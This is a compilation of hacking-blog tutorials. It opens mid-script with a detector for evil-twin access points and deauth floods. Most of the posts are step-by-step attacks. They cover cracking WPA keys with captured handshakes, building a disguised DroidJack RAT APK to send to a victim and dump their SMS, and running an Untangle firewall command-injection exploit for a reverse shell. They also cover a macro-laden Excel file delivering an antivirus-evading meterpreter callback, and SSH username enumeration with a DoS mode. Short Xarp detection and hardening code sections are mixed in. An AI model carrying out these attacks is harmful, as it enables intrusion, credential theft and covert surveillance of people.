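            continue
        reasons = ["unknown BSSID advertising our ESSID"]
        if ap.privacy == "OPN":
            reasons.append("open network (captive-portal style twin)")
        if ap.essid in legit_power and ap.power > legit_power[ap.essid]:
            reasons.append("stronger signal than our AP, so clients will prefer it")
        alerts.append((ap, reasons))
    return alerts


def find_deauth_floods(frames, window_s=1.0, threshold=20):
    """Return {source_bssid: peak count} for sources sending >= threshold deauths within any window_s span."""
    per_source = defaultdict(list)
    for ts, subtype, src, _dst in frames:
        if subtype == "deauth":
            per_source[src].append(ts)
    floods = {}
    for src, times in per_source.items():
        times.sort()
        start, peak = 0, 0
        for end, ts in enumerate(times):
            # Advance the window start until every frame in times[start:end+1] is within window_s of ts.
            while ts - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            floods[src] = peak
    return floods


if __name__ == "__main__":
    for ap, reasons in find_evil_twins(SURVEY):
        print(f"EVIL TWIN {ap.bssid} '{ap.essid}' ch{ap.channel} {ap.privacy}: " + "; ".join(reasons))
    for src, peak in find_deauth_floods(FRAMES).items():
        print(f"DEAUTH FLOOD from {src}: {peak} frames within 1 s")
```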


Cracking WiFi Password using Fern WIFi Cracker


Fern Wifi Cracker is a wireless security auditing and attack program written in the Python programming language with the Python Qt GUI library; the program is able to crack and recover WEP/WPA/WPS keys and also run other network-based attacks on wireless or Ethernet-based networks.

Fern comes preinstalled in Kali Linux, so go to Applications, then to Wireless Attacks, and then click on fern wifi cracker.

Now click on Select Interface and select the wireless interface, which will put it into monitor mode to listen to all the Wi-Fi APs nearby. Now click on Scan for Access Points.

After scanning it will show the WEP- and WPA-secured Wi-Fi networks separately, but in my case there is no WEP, so it is showing 5 WPA-secured Wi-Fi networks; click on the WPA tab.

Now it will show all the WPA Wi-Fi networks; select your target by clicking on it (in my case I have selected ttpl as my target) and then select a dictionary by clicking on BROWSE in the lower right-hand corner.

Now select your dictionary from your system. I have selected nmap.lst from the /usr/share/wordlists/ directory and then clicked on Open. (YOU CAN USE YOUR CUSTOM-MADE WORDLIST OR ANY OTHER)

Now select Regular attack and then click on WIFI ATTACK in the top right-hand corner.

Now it will prompt with WPA ATTACK REQUIREMENT, as at least 1 client is required to be connected to the target AP, so click OK.

Clicking on OK will start the attack by first deauthenticating the client, then capturing the handshake and then breaking the encryption, which will lead to successfully breaking the password if it is present in your dictionary. In my case it has successfully found my password: WPA KEY: rajchandel12345

Author: Himanshu Gupta is an Information Security Researcher | Technical writer. You can follow him on LinkedIn.


Hack Any Android Phone with DroidJack (Beginner’s Guide)


DroidJack is an Android RAT which gives you the power to establish control over your victim’s Android devices with an easy-to-use GUI and all the features you need to monitor them.

First of all download DroidJack from http://droidjack.net

Now execute DroidJack, which is an executable jar file. It will then prompt you for login, so enter your username and password.

Now clicking on the Unlock button will open a GUI interface.

Now click on Generate APK and then edit App Name and File Name with the name of your choice so that it looks genuine. Also enter the IP of your system in the Dynamic DNS field and the port number of your system in the Port Number field, and then click on Generate.

After some time it will show a prompt saying that the APK has been successfully generated and can be found in the same folder as your DroidJack application.

So now go to Devices and set the port field in the lower left corner to the same port with which you have generated the APK (in my case it is 1337) and then click on Reception to start listening mode.

Now send the APK RAT to your victim by any means.

After installing the app, when the victim clicks on the button we will get the Android session.

As you can see below, the phone is listed in the Devices list.

Now right-clicking on the mobile device will give a list of options which you can use.

Now for demo purposes I have used SMS Trekker, and as you can see it has dumped all the SMS.

AUTHOR: Sahil Gujjar is an information security enthusiast and technical writer.



3 Ways to Crack Wifi using Pyrit, oclHashcat and Cowpatty


First, start monitor mode on the wireless adaptor.

airmon-ng start wlan0

Now monitor mode is enabled with the name wlan0mon.

Then start listening to all the available Wi-Fi networks with the following command:

airodump-ng wlan0mon

This lists all nearby Wi-Fi traffic, so wait until your target appears and then hit Ctrl+C.

Now we have to listen on the specific channel the target is on. Run:

airodump-ng -c 2 --bssid 3C:1E:04:XX:XX:XX --write sommay wlan0mon

-c == channel number of the target (2 in my case, see the CH column)

--bssid == MAC address of the target AP

--write == name of the capture file

Now wait until the WPA handshake is captured and then hit Ctrl+C.

A file named sommay-01.cap will be generated.

PYRIT

The first method to crack the password from the capture file is PYRIT. We will use a dictionary attack, so run:

pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough

-i == path to the input file (in our case the dictionary)

-r == path to the capture file (in our case sommay-01.cap)

attack_passthrough == specifies that a dictionary attack is to be performed

As you can see it has successfully cracked the password.

OCLHASHCAT

First of all, download oclHashcat from its official website: https://hashcat.net/files/hashcat-2.00.7z

First we have to convert the .cap file captured with airodump-ng to .hccap using aircrack-ng:

aircrack-ng sommay-01.cap -J sommay-01

-J == the path to the output file with extension .hccap

Now copy the dictionary you want to use into the Hashcat folder, change into that folder and run:

./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst

In the above command, if you are using a 32-bit system, replace 64 with 32.

-m is the hash type, which is 2500 for WPA/WPA2 cracking

Then give the path to the .hccap file you converted with aircrack-ng, followed by the name of the dictionary file. As you can see it has successfully cracked the password.

COWPATTY

For cracking with cowpatty we first have to generate a hash file specific to the target AP. For this we use genpmk, so run:

genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY

-f == path to the dictionary file

-d == name of the output dictionary

-s == ESSID (name) of the target AP (must be identical to the target AP's ESSID)

This generates a dictionary file named cowpatty_dict that speeds up the cracking process.

Now run:

cowpatty -d cowpatty_dict -r sommay-01.cap -s SOMMAY

-d == path to the dictionary we generated with genpmk

-r == path to the capture file we generated with airodump-ng

-s == ESSID of the target AP (must be identical to the target AP's ESSID)

Author: Himanshu Gupta is an Information Security Researcher | Technical writer. You can follow him on LinkedIn.

The post 3 Ways to Crack Wifi using Pyrit, oclHashcat and Cowpatty appeared first on Hacking Articles.

How to Detect Sniffer on Your Network


Xarp is an advanced anti-spoofing tool that flags spoofing attacks that use ARP (Address Resolution Protocol) against your system; this protects documents, emails and VoIP conversations. ARP attacks allow a hacker to manipulate the data sent over the network. Xarp uses active and passive modules to detect attackers inside the network. Having such a tool on the system is important because host firewalls and OS security do not provide protection against ARP attacks.

Download the latest Xarp version from http://xarp.software.informer.com/download/

After it is downloaded, install it on your computer. Now we will perform an attack on a system with Xarp installed to show the tool's effectiveness; we perform the attack with Bettercap.

As soon as Xarp detects an ARP attack, it shows an alert on the screen like this.

Note that there was no alert or blocking from either Windows Firewall or Defender, but Xarp detects the intrusion and warns about it.

Author- Shivam Yadav is a certified ethical hacker, an enthusiast and a researcher in this field.

The post How to Detect Sniffer on Your Network appeared first on Hacking Articles.

Hack Untangle NG Firewall using command Injection Vulnerability


Untangle's NG Firewall lets us quickly and easily create network policies that strike a balance between security and productivity.

Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit. A command injection vulnerability exists in Untangle NG Firewall which allows non-root authenticated users to execute system commands with root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1 and 12.1.0 beta, but should work on previous versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy.

First of all, clone the GitHub repo of the exploit and enter the directory with:

git clone https://github.com/3xocyte/Exploits && cd Exploits

Now give the Python script permission to execute:

chmod +x untangle-ngfw-12.1-ci.py

Now start a netcat listener on port 443 for the SSL connection in a new terminal:

ncat --ssl -nlvp 443

Now execute the Python script:

python untangle-ngfw-12.1-ci.py 192.168.2.1 192.168.2.3 admin admin

Here 192.168.2.1 is the Untangle firewall IP, 192.168.2.3 is our system IP, and the username and password of the Untangle firewall are admin and admin.

As soon as the above command executes successfully we get the reverse shell.
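What makes an authenticated command injection like the one above a root compromise is a service that runs as root and hands user input to a shell. The following is an added example, not Untangle's code and not the exploit: a constructed "run a network diagnostic" endpoint written the vulnerable way beside a hardened version that allowlists the tool, validates the target as an IP address or hostname, and passes an argv list with no shell. The tool names, the hostname regex and the endpoint itself are assumptions.

```python
"""Command injection: the vulnerable pattern beside its fix (added example).

Constructed model of a management-interface endpoint that runs a network
diagnostic on a user-supplied target. Nothing here is Untangle's code.
"""
import ipaddress
import re
import subprocess
from typing import List


def build_command_vulnerable(tool: str, target: str) -> str:
    """Vulnerable: the command line is assembled by string concatenation and
    meant for `shell=True`. Shell metacharacters in `target` (';', '|',
    '$(...)') are interpreted by the shell, with the service's privileges."""
    return f"{tool} -c 1 {target}"


# Hardened version ------------------------------------------------------

# Only these tools, with fixed options, may ever be executed (assumed set).
ALLOWED_TOOLS = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute", "-m", "5"],
}

# RFC 1123 style hostname: labels of alphanumerics and hyphens, no leading
# hyphen (so a target can never be parsed as an option), dot separated.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def validate_target(target: str) -> str:
    """Accept an IPv4/IPv6 literal or a well-formed hostname; reject all else."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"invalid target: {target!r}")


def build_command_hardened(tool: str, target: str) -> List[str]:
    """Return an argv list: the tool comes from the allowlist, the target has
    been validated, and there is no shell to interpret either."""
    if tool not in ALLOWED_TOOLS:
        raise ValueError(f"tool not permitted: {tool!r}")
    return ALLOWED_TOOLS[tool] + [validate_target(target)]


def run_hardened(tool: str, target: str, timeout: float = 10.0) -> subprocess.CompletedProcess:
    """Execute the validated argv with shell=False; the target reaches execve
    as a single argument. Dropping privileges before this call is the other
    half of the fix and is outside this example."""
    return subprocess.run(
        build_command_hardened(tool, target),
        shell=False, capture_output=True, text=True, timeout=timeout,
    )


if __name__ == "__main__":
    injected = "192.168.2.1; id"   # constructed malicious input
    print("vulnerable command line :", build_command_vulnerable("ping", injected))
    print("hardened argv           :", build_command_hardened("ping", "192.168.2.1"))
    try:
        build_command_hardened("ping", injected)
    except ValueError as exc:
        print("hardened rejects        :", exc)
```

The validator is deliberately stricter than "strip semicolons": denylisting shell characters misses cases (newlines, backticks, option injection), whereas an allowlist of what a target may look like closes the whole class.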

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn .

The post Hack Untangle NG Firewall using command Injection Vulnerability appeared first on Hacking Articles.

Hack Remote PC using Microsoft Office Files (Macro Payloads)


Veil-Evasion is a powerful tool to generate payload executables that bypass common antivirus solutions.

To install Veil-Evasion on your Kali Linux, type:

apt-get install veil-evasion

After the installation completes, run Veil-Evasion with the following command in a terminal, from its installed directory:

veil-evasion

To see the available payloads, type:

list

We can see a menu of the available payloads. There are plenty to choose from.

We will be using payload ID 23. We type:

>use powershell/meterpreter/rev_https

Reverse HTTPS is used here in case the victim's PC has a firewall that restricts other TCP traffic; in most situations HTTPS is not blocked.

After that, set the local host (your PC's IP). In my case it is 192.168.0.105. Hence:

>set lhost  192.168.0.105

And then generate the payload:

generate

Enter the name of the file. Let the file to be generated be named raj. Therefore:

raj

Now Veil-Evasion has created a .bat file containing the PowerShell code in the directory:

/var/lib/veil-evasion/output/source/raj.bat

Open a new terminal window and install MacroShop. MacroShop is a collection of scripts, mostly Python, to aid in delivering payloads via Office macros. To install it we type:

git clone https://github.com/khr0x40sh/MacroShop.git

After MacroShop is cloned, open its folder and place the file "raj.bat" in that directory.

Once "raj.bat" is in the MacroShop directory, change the terminal path to MacroShop (or right-click the directory and choose "Open in terminal") and type:

python macro_safe.py raj.bat file.txt

Here file.txt is the name of the output text file that MacroShop will create.

Now open Windows -> New Microsoft Office Excel Worksheet -> View (on the top bar) -> Macros

Enter the macro name -> Create

Then, in the macro editing area, paste the code from "file.txt" and save the macro.

Now edit the Excel worksheet so that it looks authentic, and in such a way that the victim will enable the Macro option (if it is disabled).

For simplicity in this tutorial, I enter something random and save it as a Microsoft Excel 97-2003 document.

Open the Excel document again and enable the macro option (if disabled).

Meanwhile, open Metasploit on Kali Linux:

msf>use exploit/multi/handler

msf exploit(handler)>set payload windows/meterpreter/reverse_https

msf exploit(handler)>set lhost 192.168.0.105

msf exploit(handler)>set lport 8443

msf exploit(handler)>exploit

As soon as the victim enables the macro and/or opens the Excel document, voila! We get the Meterpreter session. Hence, the job is done.

Author: Harshit Rajpal is an InfoSec researcher and has a keen interest in technology. Contact here

The post Hack Remote PC using Microsoft Office Files (Macro Payloads) appeared first on Hacking Articles.

OpenSSH User Enumeration Time-Based Attack with Osueta


OpenSSH (also known as OpenBSD Secure Shell) is a suite of security-related network-level utilities based on the Secure Shell (SSH) protocol, which help to secure network communications via the encryption of network traffic over multiple authentication methods and by providing secure tunneling capabilities.

OpenSSH was designed to defeat attacks like MITM and eavesdropping by encrypting all traffic, but an attack known as the User Enumeration Time-Based Attack was discovered. It increases the efficiency of brute-force attacks: a brute-force attack needs two fields, username and password, and if the username can be guessed correctly beforehand, only the password field remains to be brute-forced, which reduces the time required.

Osueta is a simple Python script developed to exploit the OpenSSH User Enumeration Timing Attack (found in the 5.* and 6.* versions on *nix systems).

HOW THIS WORKS?

When we want to connect to an SSH server we have to provide a username and a password. First it is checked whether the username exists, then:

1.) If the username doesn't exist, the password is not compared to the original one.

2.) If the username exists, the password is compared to the original one by comparing the hash of the given password; if it matches, you are granted access.

3.) Now suppose a username exists and we use a very long password, say 40000 bytes (the default length used by osueta, like 40000 'S' characters). The hash of the given password has to be generated to compare it with the original one, so the server slows down and the measured response time increases. That increase is the key: it tells us the username exists.
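The three steps above describe a side channel that any login routine can have, not only OpenSSH: expensive password hashing that is skipped when the username is unknown. The following is an added example, not osueta's code and not OpenSSH's, that models a constructed credential store with a deliberately slow hash. `login_leaky` does the work only for existing users and so answers faster for unknown ones; `login_constant_work` always hashes once (against a dummy record when the user is missing) so the response time no longer depends on whether the username exists. The user database, the salt and the PBKDF2 iteration count are assumptions; the returned work counter exists so the behaviour can be checked without timing.

```python
"""Username enumeration by timing: the leaky login and the constant-work fix.

Added example. Models the mechanism described in the three steps above;
it does not reproduce OpenSSH's authentication code.
"""
import hashlib
import hmac
import time
from typing import Callable, Dict, Tuple

ITERATIONS = 50_000  # assumed: enough work to be measurable, cheap enough to run offline


def slow_hash(password: bytes, salt: bytes) -> bytes:
    """Deliberately expensive password hash (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, ITERATIONS)


# Constructed credential store (username -> (salt, hash)); not a real system.
SALT = b"constructed-salt"
USERS: Dict[str, Tuple[bytes, bytes]] = {
    "pp": (SALT, slow_hash(b"correct horse battery", SALT)),
}
# Dummy record hashed for unknown users so the same work is always done.
DUMMY = (SALT, slow_hash(b"dummy-password-never-accepted", SALT))


def login_leaky(username: str, password: bytes) -> Tuple[bool, int]:
    """Return (granted, expensive hashes computed).

    Step 1 of the explanation: no user, no hashing. That early return is
    the oracle; a long password makes the gap easier to measure."""
    rec = USERS.get(username)
    if rec is None:
        return False, 0
    salt, stored = rec
    return hmac.compare_digest(slow_hash(password, salt), stored), 1


def login_constant_work(username: str, password: bytes) -> Tuple[bool, int]:
    """Same contract, but exactly one hash is computed on every path, so the
    response time carries no information about the username."""
    rec = USERS.get(username)
    salt, stored = rec if rec is not None else DUMMY
    candidate = slow_hash(password, salt)
    match = hmac.compare_digest(candidate, stored)   # constant-time compare
    # An unknown user is denied even if the dummy record happened to match.
    return (match and rec is not None), 1


def time_ms(fn: Callable[[str, bytes], Tuple[bool, int]],
            username: str, password: bytes, rounds: int = 3) -> float:
    """Best-of-N wall-clock time in milliseconds (for the demo only)."""
    best = float("inf")
    for _ in range(rounds):
        t0 = time.perf_counter()
        fn(username, password)
        best = min(best, (time.perf_counter() - t0) * 1000.0)
    return best


if __name__ == "__main__":
    long_pw = b"S" * 40000   # the length the explanation above mentions
    for fn in (login_leaky, login_constant_work):
        known = time_ms(fn, "pp", long_pw)
        unknown = time_ms(fn, "no-such-user", long_pw)
        print(f"{fn.__name__:20} known={known:7.2f} ms  unknown={unknown:7.2f} ms")
```

Run stand-alone, the leaky variant shows a clear gap between an existing and a non-existing user while the constant-work variant shows none beyond noise. Doing the dummy hash is the usual fix for this class; rate limiting and a fixed minimum response time are complementary but do not remove the difference on their own.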

First clone the GitHub repo with the terminal command:

git clone https://github.com/c0r3dump3d/osueta.git

Now change directory to osueta and run:

python osueta.py -H 192.168.222.136 -U pp -p 22

-H (OpenSSH server host, i.e. the victim IP; 192.168.222.136 in my case)

-U (a guessed username that may be present on the victim machine; pp in my case)

-p (port number of the running SSH service; 22 in our case)

First it checks whether the given port is open, then the service banner is read to detect the version of the running SSH server.

Now it generates 10 random usernames to try against the target in order to measure the server's baseline response time. After that it tests the server with the provided username, and if there is a delay in authentication then the user exists; in my case the user pp exists on the target server.

We can also pass a list of users as input to check every username in the list:

./osueta.py -H 192.168.222.136 -L users.txt -p 22

-L (users input file; users.txt in my case)

In my case it has successfully enumerated the following usernames from the given list:

pp

root

him

We can also create a DoS (Denial of Service) situation on the target server with:

./osueta.py -H 192.168.222.136 -p 22 -U pp -v no --dos yes

--dos (set to yes to create a DoS situation)

First it detects whether the given user exists; if so, it opens a large number of connections to the target server, and once the session limit is reached the server starts rejecting further connections, causing a DoS.

As you can see, the target server denies the connection when I try to connect to it.

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn .

The post OpenSSH User Enumeration Time-Based Attack with Osueta appeared first on Hacking Articles.
